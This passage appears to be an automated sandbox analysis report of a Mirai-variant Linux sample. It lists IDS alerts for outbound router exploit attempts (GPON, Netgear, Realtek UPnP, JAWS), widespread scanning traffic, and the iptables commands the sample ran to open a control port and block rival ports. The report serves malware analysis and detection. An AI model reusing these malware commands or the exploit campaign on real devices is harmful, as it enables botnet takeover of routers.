                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:41214 -> 96.205.70.202:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60212 -> 102.183.168.190:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40484 -> 218.127.6.163:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37758 -> 4.33.109.123:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52626 -> 17.113.247.169:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:53022 -> 117.238.33.98:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:41742 -> 139.126.200.221:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38326 -> 168.135.70.170:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42268 -> 161.243.235.240:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:34124 -> 214.179.110.36:52869
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:38672 -> 19.99.0.75:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59804 -> 121.37.63.175:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:59994 -> 165.209.139.40:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:46626 -> 88.168.89.213:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43800 -> 48.37.127.242:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59308 -> 202.99.95.205:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43800 -> 48.37.127.242:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56956 -> 34.70.187.128:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:42466 -> 82.213.155.86:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53444 -> 61.219.168.25:49152
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:49140 -> 182.225.227.232:52869
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:53870 -> 89.35.238.39:52869
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52626 -> 17.113.247.169:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37266 -> 209.30.237.251:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60220 -> 84.227.113.193:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53422 -> 97.4.184.157:7574
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:40350 -> 24.139.219.73:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48590 -> 11.199.251.112:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:38804 -> 136.184.13.216:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46356 -> 92.45.169.28:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:53412 -> 118.186.226.119:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:36794 -> 4.241.28.42:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:33794 -> 145.241.115.127:52869
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42268 -> 161.243.235.240:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:55292 -> 188.206.66.2:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56034 -> 219.203.86.236:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45748 -> 175.171.254.37:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:52068 -> 79.28.180.59:52869
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:34030 -> 153.223.215.107:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36996 -> 27.220.140.158:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52956 -> 49.74.230.150:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37822 -> 177.122.6.73:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52762 -> 115.50.227.165:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54212 -> 157.99.17.233:49152
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59804 -> 121.37.63.175:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:38240 -> 91.150.21.151:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49482 -> 185.7.165.100:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36996 -> 27.220.140.158:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40984 -> 143.26.169.103:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58272 -> 110.93.67.47:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:51522 -> 50.156.95.160:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:56528 -> 31.78.106.128:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47940 -> 108.101.101.73:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:46108 -> 211.91.199.166:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:48098 -> 123.107.138.33:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58798 -> 51.82.89.206:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34148 -> 126.37.62.221:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43850 -> 106.242.46.194:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47720 -> 187.43.112.15:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:56374 -> 173.185.234.3:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:48338 -> 112.83.214.93:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47950 -> 138.236.242.130:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53152 -> 188.113.108.36:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:57346 -> 74.54.233.237:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57986 -> 60.182.201.114:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:40528 -> 21.59.139.64:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34596 -> 111.78.72.40:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54386 -> 53.210.10.234:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37210 -> 169.79.111.250:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:44230 -> 217.205.0.182:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56624 -> 205.208.231.137:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36760 -> 121.246.12.210:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35852 -> 165.36.4.88:49152
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:50484 -> 91.32.136.60:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:53476 -> 71.213.59.190:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:60090 -> 54.126.187.157:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:48456 -> 192.181.205.150:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:42616 -> 46.243.211.13:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48006 -> 9.104.175.198:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43962 -> 166.143.49.219:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:43506 -> 148.56.202.17:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:56998 -> 32.247.7.158:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40162 -> 205.6.203.133:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:43690 -> 17.99.132.43:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57100 -> 96.141.159.101:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49524 -> 201.192.233.8:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34954 -> 150.213.241.201:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57176 -> 136.96.254.154:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32890 -> 28.73.69.70:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40894 -> 138.164.52.41:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50662 -> 114.65.149.154:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54514 -> 78.94.137.102:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52562 -> 209.205.122.138:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37160 -> 126.148.68.48:5555
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:40856 -> 23.210.109.40:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50474 -> 67.84.206.98:5555
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:39800 -> 205.55.79.236:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:52956 -> 34.155.65.192:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:56766 -> 148.104.170.209:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:57392 -> 168.22.178.161:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:56000 -> 156.9.96.43:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:53262 -> 137.77.114.156:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:40464 -> 174.191.244.5:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:46760 -> 103.136.18.241:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:40490 -> 48.76.49.73:80
                            Source: global trafficTCP traffic: 45.153.216.8 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 13.209.203.228 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 194.213.146.39 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 196.110.129.112 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 113.146.56.79 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 207.207.172.96 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 61.2.36.48 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 32.170.33.253 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 110.142.198.158 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 217.238.86.73 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 179.30.194.108 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 43.107.215.199 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 65.131.166.130 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 141.80.218.97 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 1.146.114.34 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 37.215.196.232 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 42.186.151.84 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 210.164.84.185 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 220.74.77.186 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 101.125.216.151 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 89.213.177.170 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 121.136.2.49 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 51.217.212.91 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 79.10.209.34 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 167.126.69.248 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 92.35.9.7 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 97.164.5.45 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 167.83.233.35 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 72.93.110.172 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 113.8.22.97 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 195.121.56.192 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 177.171.143.161 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 123.175.241.125 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 53.31.107.240 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 31.20.181.48 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 142.31.67.244 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 169.30.77.109 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 73.124.161.55 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 65.143.55.175 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 26.83.38.216 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 74.94.9.126 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 222.75.43.46 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 101.108.225.47 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 108.85.179.160 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 15.233.37.150 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 215.149.25.71 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 158.219.39.254 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 9.70.45.227 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 169.80.247.56 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 84.2.80.57 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 104.26.240.22 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 93.31.4.225 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 13.9.189.7 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 79.79.71.152 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 161.199.124.145 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 36.77.84.33 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 166.192.145.39 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 217.176.190.109 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 131.95.252.218 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 218.232.108.182 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 164.98.152.87 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 79.39.229.25 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 53.169.246.148 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 216.243.102.141 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 162.33.207.205 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 170.243.90.64 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 4.134.245.148 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 193.245.80.68 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 206.139.158.36 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 11.152.97.248 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 170.59.144.179 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 53.188.136.82 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 17.238.190.54 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 47.69.248.12 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 214.6.88.200 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 149.241.161.180 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 222.31.51.54 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 161.191.205.75 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 62.217.115.182 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 121.19.25.76 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 76.227.143.215 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 50.91.199.9 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 59.92.247.206 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 125.133.16.27 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 209.95.98.5 ports 2,5,6,8,9,52869
                            Source: /bin/sh (PID: 6286)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6293)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6300)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6305)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6311)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6317)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6320)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6323)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6333)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6337)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6342)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6366)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6373)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6376)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6382)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6388)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6394)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6400)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6406)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6412)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6418)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6423)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6430)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROPJump to behavior
